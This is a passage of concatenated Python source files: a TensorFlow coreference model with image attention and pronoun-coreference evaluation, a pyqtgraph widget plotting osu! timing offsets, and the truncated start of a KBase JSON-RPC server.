                f = tf.sigmoid(util.projection(tf.concat([top_span_emb, attended_span_emb], 1), util.shape(top_span_emb, -1))) # [k, emb]
                top_span_emb = f * attended_span_emb + (1 - f) * top_span_emb # [k, emb]
    top_antecedent_scores = tf.concat([dummy_scores, top_antecedent_scores], 1) # [k, c + 1]
    top_antecedent_cluster_ids = tf.gather(top_span_cluster_ids, top_antecedents) # [k, c]
    # invalid antecedents get cluster id -inf -> int min, never matching gold
    top_antecedent_cluster_ids += tf.to_int32(tf.log(tf.to_float(top_antecedents_mask))) # [k, c]
    same_cluster_indicator = tf.equal(top_antecedent_cluster_ids, tf.expand_dims(top_span_cluster_ids, 1)) # [k, c]
    non_dummy_indicator = tf.expand_dims(top_span_cluster_ids > 0, 1) # [k, 1]
    pairwise_labels = tf.logical_and(same_cluster_indicator, non_dummy_indicator) # [k, c]
    dummy_labels = tf.logical_not(tf.reduce_any(pairwise_labels, 1, keepdims=True)) # [k, 1]
    top_antecedent_labels = tf.concat([dummy_labels, pairwise_labels], 1) # [k, c + 1]
    loss = self.softmax_loss(top_antecedent_scores, top_antecedent_labels) # [k]
    loss = tf.reduce_sum(loss) # []
    outputs = [candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends, top_antecedents, top_antecedent_scores,
               tokens_cdd, tokens_obj]
    if self.use_im:
        outputs.append(att_grid)
    else:
        # placeholder so outputs has a fixed length either way
        outputs.append(tf.zeros([1, 1]))
    return outputs, loss
def get_span_emb_dial(self, head_emb, context_outputs, span_starts, span_ends):
    """Span embeddings for dialog spans indexed into the flat word sequence.

    Concatenates: start-word state, end-word state, optional span-width
    feature embedding, and an optional attention-weighted head embedding.
    head_emb/context_outputs are [num_words, emb]; span_starts/span_ends are
    word indices. Side effect: stores the per-word head scores in
    self.head_scores for later inspection.
    """
    span_emb_list = []
    span_start_emb = tf.gather(context_outputs, span_starts) # [k, emb]
    span_emb_list.append(span_start_emb)
    span_end_emb = tf.gather(context_outputs, span_ends) # [k, emb]
    span_emb_list.append(span_end_emb)
    span_width = 1 + span_ends - span_starts # [k]
    if self.config["use_features"]:
        span_width_index = span_width - 1 # [k]; width 1 -> bucket 0
        with tf.variable_scope("use_feature", reuse=tf.AUTO_REUSE):
            span_width_emb = tf.gather(tf.get_variable("span_width_embeddings", [self.config["max_span_width"], self.config["feature_size"]]), span_width_index) # [k, emb]
        span_width_emb = tf.nn.dropout(span_width_emb, self.dropout)
        span_emb_list.append(span_width_emb)
    if self.config["model_heads"]:
        span_indices = tf.expand_dims(tf.range(self.config["max_span_width"]), 0) + tf.expand_dims(span_starts, 1) # [k, max_span_width]
        span_indices = tf.minimum(util.shape(context_outputs, 0) - 1, span_indices) # [k, max_span_width]; clamp past-the-end indices
        span_text_emb = tf.gather(head_emb, span_indices) # [k, max_span_width, emb]
        with tf.variable_scope("head_scores", reuse=tf.AUTO_REUSE):
            self.head_scores = util.projection(context_outputs, 1) # [num_words, 1]
        span_head_scores = tf.gather(self.head_scores, span_indices) # [k, max_span_width, 1]
        span_mask = tf.expand_dims(tf.sequence_mask(span_width, self.config["max_span_width"], dtype=tf.float32), 2) # [k, max_span_width, 1]
        span_head_scores += tf.log(span_mask) # [k, max_span_width, 1]; -inf outside the span
        span_attention = tf.nn.softmax(span_head_scores, 1) # [k, max_span_width, 1]
        span_head_emb = tf.reduce_sum(span_attention * span_text_emb, 1) # [k, emb]
        span_emb_list.append(span_head_emb)
    span_emb = tf.concat(span_emb_list, 1) # [k, emb]
    return span_emb # [k, emb]
def get_span_emb_phrases(self, head_emb, context_outputs, span_starts, span_ends):
    """Span embeddings for phrase-per-row inputs (caption NPs, pool/object phrases).

    Unlike get_span_emb_dial, context_outputs is 3-D here: one padded row per
    phrase. Each phrase always begins at column 0 of its row, so only
    span_width (= span_ends - span_starts + 1) is taken from the global
    start/end indices.
    """
    # context_outputs: [num_candidates_cap, max_candidate_length_cap, emb]
    # head_emb [num_candidates_cap, max_span_width_cap, emb]
    span_emb_list = []
    num_candidates = util.shape(context_outputs, 0)
    span_width = 1 + span_ends - span_starts # [num_candidates_cap]
    max_span_width = util.shape(context_outputs, 1)
    context_emb_size = util.shape(context_outputs, 2)
    # flatten so each phrase's tokens occupy a contiguous index range
    context_outputs = tf.reshape(context_outputs, [-1, context_emb_size]) # [num_candidates_cap * max_candidate_length_cap, emb]
    span_start_indices = tf.range(num_candidates) * max_span_width # [num_candidates_cap]
    span_start_emb = tf.gather(context_outputs, span_start_indices) # [num_candidates_cap, emb]
    span_emb_list.append(span_start_emb)
    span_end_indices = span_start_indices + span_width - 1 # [num_candidates_cap]
    span_end_emb = tf.gather(context_outputs, span_end_indices) # [num_candidates_cap, emb]
    span_emb_list.append(span_end_emb)
    if self.config["use_features"]:
        span_width_index = span_width - 1 # [k]
        with tf.variable_scope("use_feature", reuse=tf.AUTO_REUSE):
            span_width_emb = tf.gather(tf.get_variable("span_width_embeddings", [self.config["max_span_width"], self.config["feature_size"]]), span_width_index) # [k, emb]
        span_width_emb = tf.nn.dropout(span_width_emb, self.dropout)
        span_emb_list.append(span_width_emb)
    if self.config["model_heads"]:
        with tf.variable_scope("head_scores", reuse=tf.AUTO_REUSE):
            span_head_scores = util.projection(context_outputs, 1) # [num_candidates_cap * max_span_width, 1]
        span_head_scores = tf.reshape(span_head_scores, [num_candidates, max_span_width, 1])
        span_mask = tf.expand_dims(tf.sequence_mask(span_width, max_span_width, dtype=tf.float32), 2) # [k, max_span_width, 1]
        span_head_scores += tf.log(span_mask) # [k, max_span_width, 1]; -inf on padding
        span_attention = tf.nn.softmax(span_head_scores, 1) # [k, max_span_width, 1]
        span_head_emb = tf.reduce_sum(span_attention * head_emb, 1) # [k, emb]
        span_emb_list.append(span_head_emb)
    span_emb = tf.concat(span_emb_list, 1) # [k, emb]
    return span_emb # [k, emb]
def get_span_im_emb(self, span_emb, obj_span_emb):
    """Soft attention of each text span over the image-object embeddings.

    Projects spans and objects into a shared space, combines them by
    element-wise product (L2-normalized), and scores each (span, object)
    pair with a learned vector. Returns softmax attention [k, n].

    NOTE(review): both projections sit in the same "att_projection0" scope;
    under reuse=tf.AUTO_REUSE that would share projection weights between
    text and objects — confirm against the original (pre-stripped) indentation.
    """
    k = util.shape(span_emb, 0)
    n = util.shape(obj_span_emb, 0)
    with tf.variable_scope("image_attention", reuse=tf.AUTO_REUSE):
        # span_emb: [k, emb]
        map_dim = self.im_emb_size
        with tf.variable_scope("att_projection0"):
            text_map = util.projection(span_emb, map_dim) # [k, map_dim]
            obj_map = util.projection(obj_span_emb, map_dim) # [k, map_dim]
        text_map = tf.nn.relu(text_map)
        obj_map = tf.nn.relu(obj_map)
        text_map = tf.tile(tf.expand_dims(text_map, 1), [1, n, 1]) # [k, n, map_dim]
        obj_map = tf.tile(tf.expand_dims(obj_map, 0), [k, 1, 1]) # [k, n, map_dim]
        # interact via element wise map
        text_obj_combine = tf.nn.l2_normalize(text_map * obj_map, 2) # [k, n, map_dim]
        with tf.variable_scope("get_attention"):
            w_att = tf.get_variable('w_att', [map_dim, 1], initializer=tf.contrib.layers.xavier_initializer())
            att_grid = tf.reshape(tf.matmul(tf.reshape(text_obj_combine, [-1, map_dim]), w_att), [k, n]) # [k, n]
        # softmax
        att_grid_soft = tf.nn.softmax(att_grid) # [k, n]
        return att_grid_soft # [k, n]
def get_mention_scores(self, span_emb):
    """Score each span's likelihood of being a mention with an FFNN. Returns [k, 1]."""
    with tf.variable_scope("mention_scores"):
        return util.ffnn(span_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [k, 1]
def softmax_loss(self, antecedent_scores, antecedent_labels):
    """Negative marginal log-likelihood over all gold antecedents of each span.

    Non-gold entries are pushed to -inf via log(0) so logsumexp marginalizes
    over gold antecedents only. Returns a per-span loss vector [k].
    """
    gold_only_scores = antecedent_scores + tf.log(tf.to_float(antecedent_labels))  # [k, max_ant + 1]
    gold_log_marginal = tf.reduce_logsumexp(gold_only_scores, [1])  # [k]
    log_partition = tf.reduce_logsumexp(antecedent_scores, [1])  # [k]
    return log_partition - gold_log_marginal  # [k]
def bucket_distance(self, distances):
    """
    Places the given values (designed for distances) into 10 semi-logscale buckets:
    [0, 1, 2, 3, 4, 5-7, 8-15, 16-31, 32-63, 64+].
    """
    # Log-scale bucket index for distances > 4 (floor(log2(d)) + 3).
    log_bucket = tf.to_int32(tf.floor(tf.log(tf.to_float(distances)) / math.log(2))) + 3
    # Distances 0..4 map to themselves; larger ones use the log bucket.
    keep_identity = tf.to_int32(distances <= 4)
    bucket = keep_identity * distances + (1 - keep_identity) * log_bucket
    return tf.clip_by_value(bucket, 0, 9)
def get_slow_antecedent_scores(self, top_span_emb, top_antecedents, top_antecedent_emb, top_antecedent_offsets, top_span_speaker_ids, im_feat, att_grid=None, has_obj=None):
    """Pairwise antecedent scores from span-pair features via an FFNN.

    Features per (span, antecedent) pair: optional same-speaker embedding,
    optional image feature (im_feat projected through im_layer FC layers),
    optional bucketed-distance embedding; plus the two span embeddings and
    their element-wise product. When self.use_im, also computes a second
    score head from the image-attention grid and returns a pair
    (text_scores, im_scores); otherwise returns text scores only, [k, c].
    """
    k = util.shape(top_span_emb, 0)
    c = util.shape(top_antecedents, 1)
    feature_emb_list = []
    if self.config["use_metadata"]:
        top_antecedent_speaker_ids = tf.gather(top_span_speaker_ids, top_antecedents) # [k, c]
        same_speaker = tf.equal(tf.expand_dims(top_span_speaker_ids, 1), top_antecedent_speaker_ids) # [k, c]
        speaker_pair_emb = tf.gather(tf.get_variable("same_speaker_emb", [2, self.config["feature_size"]]), tf.to_int32(same_speaker)) # [k, c, emb]
        feature_emb_list.append(speaker_pair_emb)
    if self.use_im_fc:
        im_emb = tf.expand_dims(im_feat, 0)
        im_emb = tf.nn.dropout(im_emb, self.im_dropout)
        if self.config["im_layer"] > 0:
            # project the image feature through im_layer FC layers
            for i in range(self.config["im_layer"]):
                im_weights = tf.get_variable("im_weights_{}".format(i), [util.shape(im_emb, 1), self.im_fc_emb_size], initializer=None)
                im_bias = tf.get_variable("im_bias_{}".format(i), [self.im_fc_emb_size], initializer=None)
                im_emb = tf.nn.xw_plus_b(im_emb, im_weights, im_bias)
        # same image feature broadcast to every (span, antecedent) pair
        tiled_im_emb = tf.tile(tf.expand_dims(im_emb, 0), [k, c, 1]) # [k, c, emb]
        feature_emb_list.append(tiled_im_emb)
    if self.config["use_features"]:
        antecedent_distance_buckets = self.bucket_distance(top_antecedent_offsets) # [k, c]
        antecedent_distance_emb = tf.gather(tf.get_variable("antecedent_distance_emb", [10, self.config["feature_size"]]), antecedent_distance_buckets) # [k, c]
        feature_emb_list.append(antecedent_distance_emb)
    feature_emb = tf.concat(feature_emb_list, 2) # [k, c, emb]
    feature_emb = tf.nn.dropout(feature_emb, self.dropout) # [k, c, emb]
    target_emb = tf.expand_dims(top_span_emb, 1) # [k, 1, emb=1270]
    similarity_emb = top_antecedent_emb * target_emb # [k, c, emb]
    target_emb = tf.tile(target_emb, [1, c, 1]) # [k, c, emb]
    pair_emb = tf.concat([target_emb, top_antecedent_emb, similarity_emb, feature_emb], 2) # [k, c, emb=3850]
    with tf.variable_scope("slow_antecedent_scores"):
        slow_antecedent_scores = util.ffnn(pair_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [k, c, 1]
    slow_antecedent_scores = tf.squeeze(slow_antecedent_scores, 2) # [k, c]
    if self.use_im:
        # att max: each span's strongest object attention (last column excluded —
        # presumably a "no object" slot; tf.cond falls back to zeros without objects)
        def zero_att_max(k):
            return tf.zeros([k, 1])
        def obj_att_max(att_grid):
            return tf.reduce_max(att_grid[:, :-1], axis=1, keepdims=True) # [k, 1]
        top_span_att_max = tf.cond(has_obj, lambda: obj_att_max(att_grid), lambda: zero_att_max(k)) # [k, 1]
        top_antecedent_att_max = tf.gather(top_span_att_max, top_antecedents) # [k, c, 1]
        target_att_max = tf.expand_dims(top_span_att_max, 2) # [k, 1, 1]
        similarity_emb_att = top_antecedent_att_max * target_att_max # [k, c, 1]
        target_emb_att = tf.tile(target_att_max, [1, c, 1]) # [k, c, 1]
        # att similarity
        top_antecedent_att = tf.gather(att_grid, top_antecedents) # [k, c, n]
        top_span_att = tf.expand_dims(att_grid, 1) # [k, 1, n]
        def zero_ant_att_max(k, c):
            return tf.zeros([k, c, 1])
        def obj_ant_att_max(att_grid):
            return tf.reduce_max(att_grid[:, :, :-1], axis=2, keepdims=True) # [k, c, 1]
        top_span_antecedent_att_max = tf.cond(has_obj, lambda: obj_ant_att_max(top_antecedent_att * top_span_att), lambda: zero_ant_att_max(k, c)) # [k, c, 1]
        similarity_emb_att = tf.concat([similarity_emb_att, top_span_antecedent_att_max], 2) # [k, c, 2]
        pair_emb_im = tf.concat([target_emb_att, top_antecedent_att_max, similarity_emb_att], 2) # [k, c, 4 (+3n)]
        with tf.variable_scope("slow_antecedent_scores_im"):
            slow_antecedent_scores_im = util.ffnn(pair_emb_im, self.config["ffnn_depth_im"], self.config["ffnn_size_im"], 1, self.dropout) # [k, c, 1]
        slow_antecedent_scores_im = tf.squeeze(slow_antecedent_scores_im, 2) # [k, c]
        return slow_antecedent_scores, slow_antecedent_scores_im # [k, c]
    return slow_antecedent_scores # [k, c]
def get_fast_antecedent_scores(self, top_span_emb):
    """Bilinear coarse score between every ordered pair of top spans, [k, k]."""
    with tf.variable_scope("src_projection"):
        # project the "source" side; dropout applied to both sides
        projected_src = tf.nn.dropout(util.projection(top_span_emb, util.shape(top_span_emb, -1)), self.dropout)  # [k, emb]
    dropped_tgt = tf.nn.dropout(top_span_emb, self.dropout)  # [k, emb]
    return tf.matmul(projected_src, dropped_tgt, transpose_b=True)  # [k, k]
def flatten_emb_by_sentence(self, emb, text_len_mask):
    """Collapse the sentence dimension and keep only unpadded positions.

    emb is [num_sentences, max_sentence_length] or [..., emb_size];
    text_len_mask marks real tokens. Returns [num_words] or [num_words, emb_size].
    """
    num_sentences = tf.shape(emb)[0]
    max_sentence_length = tf.shape(emb)[1]
    total_positions = num_sentences * max_sentence_length
    rank = len(emb.get_shape())
    if rank == 2:
        flat = tf.reshape(emb, [total_positions])
    elif rank == 3:
        flat = tf.reshape(emb, [total_positions, util.shape(emb, 2)])
    else:
        raise ValueError("Unsupported rank: {}".format(rank))
    return tf.boolean_mask(flat, tf.reshape(text_len_mask, [total_positions]))
def lstm_contextualize(self, text_emb, text_len, text_len_mask=None):
    """Run stacked BiLSTMs (with highway connections after layer 0) over text_emb.

    text_emb: [num_sentences, max_sentence_length, emb]; text_len gives the
    true length of each row. If text_len_mask is given, the padded output is
    flattened to only valid tokens ([num_words, emb]); otherwise the padded
    [num_sentences, max_sentence_length, emb] tensor is returned.
    """
    num_sentences = tf.shape(text_emb)[0]
    current_inputs = text_emb # [num_sentences, max_sentence_length, emb]
    for layer in range(self.config["contextualization_layers"]):
        with tf.variable_scope("layer_{}".format(layer), reuse=tf.AUTO_REUSE):
            with tf.variable_scope("fw_cell", reuse=tf.AUTO_REUSE):
                cell_fw = util.CustomLSTMCell(self.config["contextualization_size"], num_sentences, self.lstm_dropout)
            with tf.variable_scope("bw_cell", reuse=tf.AUTO_REUSE):
                cell_bw = util.CustomLSTMCell(self.config["contextualization_size"], num_sentences, self.lstm_dropout)
            # broadcast the cells' learned initial state across the batch
            state_fw = tf.contrib.rnn.LSTMStateTuple(tf.tile(cell_fw.initial_state.c, [num_sentences, 1]), tf.tile(cell_fw.initial_state.h, [num_sentences, 1]))
            state_bw = tf.contrib.rnn.LSTMStateTuple(tf.tile(cell_bw.initial_state.c, [num_sentences, 1]), tf.tile(cell_bw.initial_state.h, [num_sentences, 1]))
            (fw_outputs, bw_outputs), _ = tf.nn.bidirectional_dynamic_rnn(
                cell_fw=cell_fw,
                cell_bw=cell_bw,
                inputs=current_inputs,
                sequence_length=text_len,
                initial_state_fw=state_fw,
                initial_state_bw=state_bw)
            text_outputs = tf.concat([fw_outputs, bw_outputs], 2) # [num_sentences, max_sentence_length, emb]
            text_outputs = tf.nn.dropout(text_outputs, self.lstm_dropout)
            if layer > 0:
                # highway connection between stacked layers
                highway_gates = tf.sigmoid(util.projection(text_outputs, util.shape(text_outputs, 2))) # [num_sentences, max_sentence_length, emb]
                text_outputs = highway_gates * text_outputs + (1 - highway_gates) * current_inputs
            current_inputs = text_outputs # [num_sentences, max_sentence_length, emb]
    if text_len_mask is None:
        return text_outputs
    else:
        return self.flatten_emb_by_sentence(text_outputs, text_len_mask)
def get_predicted_antecedents(self, antecedents, antecedent_scores):
    """Pick each span's best-scoring antecedent; -1 means the dummy (no antecedent).

    antecedent_scores is [k, c + 1] with the dummy in column 0, so the argmax
    is shifted down by one before indexing into antecedents [k, c].
    """
    best_columns = np.argmax(antecedent_scores, axis=1) - 1
    return [
        -1 if col < 0 else antecedents[row, col]
        for row, col in enumerate(best_columns)
    ]
def get_predicted_clusters(self, top_span_starts, top_span_ends, predicted_antecedents):
    """Union spans with their predicted antecedents into clusters.

    Returns (predicted_clusters, mention_to_predicted): a list of mention
    tuples per cluster, and a map from each mention to its cluster tuple.
    Spans whose antecedent is -1 (dummy) start no cluster on their own.
    """
    mention_to_cluster_id = {}
    clusters = []
    for span_idx, ant_idx in enumerate(predicted_antecedents):
        if ant_idx < 0:
            continue
        assert span_idx > ant_idx
        antecedent = (int(top_span_starts[ant_idx]), int(top_span_ends[ant_idx]))
        cluster_id = mention_to_cluster_id.get(antecedent)
        if cluster_id is None:
            # antecedent seen for the first time: open a new cluster with it
            cluster_id = len(clusters)
            clusters.append([antecedent])
            mention_to_cluster_id[antecedent] = cluster_id
        mention = (int(top_span_starts[span_idx]), int(top_span_ends[span_idx]))
        clusters[cluster_id].append(mention)
        mention_to_cluster_id[mention] = cluster_id
    frozen_clusters = [tuple(cluster) for cluster in clusters]
    mention_to_predicted = {m: frozen_clusters[cid] for m, cid in mention_to_cluster_id.items()}
    return frozen_clusters, mention_to_predicted
def get_predicted_clusters_attention(self, top_span_starts, top_span_ends, att_grid, predicted_antecedents):
    """Like get_predicted_clusters, but also returns per-mention attention rows.

    Returns (predicted_clusters, predicted_att_grids, mention_to_predicted),
    where predicted_att_grids[c][m] is the att_grid row of the m-th mention
    of cluster c.  att_grid rows are aligned with the top spans.
    """
    # Reuse the canonical clustering implementation instead of duplicating it.
    predicted_clusters, mention_to_predicted = self.get_predicted_clusters(
        top_span_starts, top_span_ends, predicted_antecedents)

    # Index the top spans once (first occurrence wins, matching the original
    # linear scan) instead of scanning all spans for every mention, which
    # was O(clusters * mentions * spans).
    span_to_index = {}
    for index, (start, end) in enumerate(zip(top_span_starts, top_span_ends)):
        span_to_index.setdefault((int(start), int(end)), index)

    predicted_att_grids = []
    for cluster in predicted_clusters:
        att_grid_cluster = []
        for mention in cluster:
            if mention not in span_to_index:
                raise ValueError('antecedent not found in top spans')
            att_grid_cluster.append(att_grid[span_to_index[mention]])
        predicted_att_grids.append(att_grid_cluster)
    return predicted_clusters, predicted_att_grids, mention_to_predicted
def evaluate_coref(self, top_span_starts, top_span_ends, predicted_antecedents, gold_clusters):
    """Build the predicted clusters for one document.

    `gold_clusters` is accepted for interface compatibility but is not used:
    the gold-based evaluator update that once consumed the mention_to_gold
    mapping has been removed, so building it here was dead computation.
    Only the predicted clusters are returned.
    """
    predicted_clusters, _ = self.get_predicted_clusters(
        top_span_starts, top_span_ends, predicted_antecedents)
    return predicted_clusters
def load_eval_data(self):
    """Lazily load and tensorize the JSON-lines eval set into self.eval_data."""
    if self.eval_data is None:
        def load_line(line):
            # One JSON document per line; keep both the tensorized form
            # (for feeding the model) and the raw example (for scoring).
            example = json.loads(line)
            return self.tensorize_example(example, is_training=False), example
        with open(self.config["eval_path"]) as f:
            self.eval_data = [load_line(l) for l in f.readlines()]
        # NOTE(review): num_words is computed but never used — confirm whether
        # it was meant to be reported alongside the example count.
        num_words = sum(tensorized_example[2].sum() for tensorized_example, _ in self.eval_data)
        print(f"Loaded {len(self.eval_data)} eval examples.")
def evaluate(self, session, official_stdout=False):
    """Run pronoun-coreference evaluation over the eval set.

    Feeds every tensorized example through `session`, decodes antecedents
    into clusters, scores them with PrCorefEvaluator, prints a P/R/F report
    and returns (tf summary, average F1).

    NOTE(review): `official_stdout` is never read in this body — confirm
    whether official CoNLL scoring was removed intentionally.
    """
    self.load_eval_data()
    coref_predictions = {}
    pr_coref_evaluator = metrics.PrCorefEvaluator()
    for example_num, (tensorized_example, example) in enumerate(self.eval_data):
        feed_dict = {i:t for i,t in zip(self.input_tensors, tensorized_example)}
        outputs = session.run(self.predictions, feed_dict=feed_dict)
        # Unpack the fixed prediction tuple produced by the model graph.
        candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends, top_antecedents, top_antecedent_scores, tokens_cdd, tokens_obj, att_grid = outputs
        predicted_antecedents = self.get_predicted_antecedents(top_antecedents, top_antecedent_scores)
        coref_predictions[example["doc_key"]] = self.evaluate_coref(top_span_starts, top_span_ends, predicted_antecedents, example["clusters"])
        pr_coref_evaluator.update(coref_predictions[example["doc_key"]], example["pronoun_info"], example["sentences"], tokens_cdd)
        if example_num % 50 == 0:
            print(f"Evaluated {example_num + 1}/{len(self.eval_data)} examples.")
    summary_dict = {}
    pr_coref_results = pr_coref_evaluator.get_prf()
    summary_dict["Pronoun Coref average F1 (py)"] = pr_coref_results['f']
    print(f"Pronoun Coref average F1 (py): {pr_coref_results['f'] * 100:.2f}%")
    summary_dict["Pronoun Coref average precision (py)"] = pr_coref_results['p']
    print(f"Pronoun Coref average precision (py): {pr_coref_results['p'] * 100:.2f}%")
    summary_dict["Pronoun Coref average recall (py)"] = pr_coref_results['r']
    print(f"Pronoun Coref average recall (py): {pr_coref_results['r'] * 100:.2f}%")
    summary_dict["Discussed Pronoun Coref average F1 (py)"] = pr_coref_results['f_discussed']
    print(f"Discussed Pronoun Coref average F1 (py): {pr_coref_results['f_discussed'] * 100:.2f}%")
    summary_dict["Discussed Pronoun Coref average precision (py)"] = pr_coref_results['p_discussed']
    print(f"Discussed Pronoun Coref average precision (py): {pr_coref_results['p_discussed'] * 100:.2f}%")
    summary_dict["Discussed Pronoun Coref average recall (py)"] = pr_coref_results['r_discussed']
    print(f"Discussed Pronoun Coref average recall (py): {pr_coref_results['r_discussed'] * 100:.2f}%")
    summary_dict["Not Discussed Pronoun Coref average F1 (py)"] = pr_coref_results['f_not_discussed']
    print(f"Not Discussed Pronoun Coref average F1 (py): {pr_coref_results['f_not_discussed'] * 100:.2f}%")
    summary_dict["Not Discussed Pronoun Coref average precision (py)"] = pr_coref_results['p_not_discussed']
    print(f"Not Discussed Pronoun Coref average precision (py): {pr_coref_results['p_not_discussed'] * 100:.2f}%")
    summary_dict["Not Discussed Pronoun Coref average recall (py)"] = pr_coref_results['r_not_discussed']
    print(f"Not Discussed Pronoun Coref average recall (py): {pr_coref_results['r_not_discussed'] * 100:.2f}%")
    average_f1 = pr_coref_results['f']
    # NOTE(review): tf.maximum/tf.assign create NEW graph ops on every call
    # to evaluate(), growing the graph over repeated evaluations — consider
    # building these ops once at model-construction time.
    max_eval_f1 = tf.maximum(self.max_eval_f1, average_f1)
    self.update_max_f1 = tf.assign(self.max_eval_f1, max_eval_f1)
    return util.make_summary(summary_dict), average_f1
|
graph_toffset_bpm_inc.py | import pyqtgraph
from pyqtgraph.Qt import QtCore, QtGui
import numpy as np
import threading
from osu_analysis import StdScoreData
from app.data_recording.data import RecData
class GraphTOffsetBPMInc(QtGui.QWidget):
    """Scatter plot of average hit-time offset vs time since last BPM increase."""

    # Emitted by the worker thread with (data_x, data_y) so that the actual
    # plotting happens back on the Qt GUI thread.
    __calc_data_event = QtCore.pyqtSignal(object, object)

    def __init__(self, parent=None):
        QtGui.QWidget.__init__(self, parent)

        # When True, points sharing (approximately) the same x are averaged.
        self.__avg_data_points = True

        # Main graph
        self.__graph = pyqtgraph.PlotWidget(title='Avg T-Offset vs BPM Increase')
        self.__graph.getPlotItem().getAxis('left').enableAutoSIPrefix(False)
        self.__graph.getPlotItem().getAxis('bottom').enableAutoSIPrefix(False)
        self.__graph.enableAutoRange(axis='x', enable=False)
        self.__graph.enableAutoRange(axis='y', enable=False)
        #self.__graph.setLimits(xMin=-10, xMax=5000, yMin=-200, yMax=200)
        self.__graph.setRange(xRange=[-10, 300], yRange=[-200, 200])
        self.__graph.setLabel('left', 'T-Offset', units='ms', unitPrefix='')
        self.__graph.setLabel('bottom', 'Time since last BPM Increase', units='ms', unitPrefix='')
        self.__graph.addLegend()

        # Used to set text in legend item
        self.__label_style = pyqtgraph.PlotDataItem(pen=(0,0,0))
        self.__graph.getPlotItem().legend.addItem(self.__label_style, '')
        self.__text = self.__graph.getPlotItem().legend.getLabel(self.__label_style)

        # Put it all together
        self.__layout = QtGui.QHBoxLayout(self)
        self.__layout.setContentsMargins(0, 0, 0, 0)
        self.__layout.setSpacing(2)
        self.__layout.addWidget(self.__graph)

        # Connect signals
        self.__calc_data_event.connect(self.__display_data)

    def plot_data(self, play_data):
        """Kick off async processing of `play_data`; results arrive via signal."""
        # Clear plots for redraw
        self.__graph.clearPlots()
        self.__text.setText(f'')

        if play_data.shape[0] == 0:
            return

        # Heavy numpy work runs off the GUI thread.
        thread = threading.Thread(target=self.__proc_data, args=(play_data, ))
        thread.start()

    def __proc_data(self, play_data):
        """Worker: collect press-hit offsets per play, optionally average, emit."""
        hit_timings_all = np.asarray([])
        time_bpm_all = np.asarray([])

        unique_timestamps = np.unique(play_data[:, RecData.TIMESTAMP])
        for timestamp in unique_timestamps:
            data_select = \
                (play_data[:, RecData.TIMESTAMP] == timestamp) & \
                (play_data[:, RecData.ACT_TYPE] == StdScoreData.ACTION_PRESS)
            data = play_data[data_select]

            hit_timings = data[:, RecData.T_OFFSETS]
            # NOTE(review): the x-axis is labelled "Time since last BPM
            # Increase" but the column read is RecData.DT_DEC — confirm
            # which field is intended.
            time_bpm_inc = data[:, RecData.DT_DEC]

            # Keep only successful press hits.
            data_filter = data[:, RecData.HIT_TYPE] == StdScoreData.TYPE_HITP
            hit_timings = hit_timings[data_filter]
            time_bpm_inc = time_bpm_inc[data_filter]

            # Prepend each play's samples. np.insert at index 0 copies the
            # whole array every iteration (quadratic overall) — acceptable
            # for typical play-data sizes.
            hit_timings_all = np.insert(hit_timings_all, 0, hit_timings)
            time_bpm_all = np.insert(time_bpm_all, 0, time_bpm_inc)

        if self.__avg_data_points:
            # Average overlapping data points (those that fall on same velocity)
            # NOTE(review): np.sort before .mean() has no effect on the mean.
            hit_timings_all = np.asarray([ np.sort(hit_timings_all[np.abs(time_bpm_all - time_bpm) < 3]).mean() for time_bpm in np.unique(time_bpm_all) ])
            time_bpm_all = np.unique(time_bpm_all)

        data_x = time_bpm_all
        data_y = hit_timings_all
        self.__calc_data_event.emit(data_x, data_y)

    def __display_data(self, data_x, data_y):
        """GUI-thread slot: render the computed scatter points."""
        colors = pyqtgraph.mkBrush(color=[ 255, 0, 0, 150 ])
        self.__graph.plot(x=data_x, y=data_y, pen=None, symbol='o', symbolPen=None, symbolSize=5, symbolBrush=colors)
|
annotation_ontology_apiServer.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from annotation_ontology_api.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
    """Return the deployment config path from the environment, or None."""
    return environ.get(DEPLOY)
def get_service_name():
    """Return the service name from the environment, or None."""
    return environ.get(SERVICE)
def get_config():
    """Parse the deployment config file into a plain dict, or return None.

    Reads the section named after the service (default
    'annotation_ontology_api') from the file pointed at by the deployment
    environment variable.
    """
    cfg_file = get_config_file()
    if not cfg_file:
        return None
    parser = ConfigParser()
    parser.read(cfg_file)
    section = get_service_name() or 'annotation_ontology_api'
    return dict(parser.items(section))
# Parse the deployment configuration once at import time and hand it to the
# implementation class; the import is deferred until config exists.
config = get_config()

from annotation_ontology_api.annotation_ontology_apiImpl import annotation_ontology_api  # noqa @IgnorePep8
impl_annotation_ontology_api = annotation_ontology_api(config)
class JSONObjectEncoder(json.JSONEncoder):
    """JSON encoder that also serializes sets, frozensets and objects
    exposing a toJSONable() method."""

    def default(self, obj):
        # Both flavours of set become JSON arrays.
        if isinstance(obj, (set, frozenset)):
            return list(obj)
        # Objects may opt in to serialization via toJSONable().
        to_jsonable = getattr(obj, 'toJSONable', None)
        if to_jsonable is not None:
            return to_jsonable()
        return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
    """JSONRPCService variant that pre-deserializes requests, threads a call
    context (ctx) into every method, and serializes results with
    JSONObjectEncoder.

    NOTE(review): this class uses Python 2-only constructs (`e.message`,
    `basestring`, `dict.has_key`) — it will not run unmodified on Python 3.
    """

    def call(self, ctx, jsondata):
        """
        Calls jsonrpc service's method and returns its return value in a JSON
        string or None if there is none.

        Arguments:
        jsondata -- remote method call in jsonrpc format
        """
        result = self.call_py(ctx, jsondata)
        if result is not None:
            return json.dumps(result, cls=JSONObjectEncoder)

        return None

    def _call_method(self, ctx, request):
        """Calls given method with given params and returns it value."""
        method = self.method_data[request['method']]['method']
        params = request['params']
        result = None
        try:
            if isinstance(params, list):
                # Does it have enough arguments?
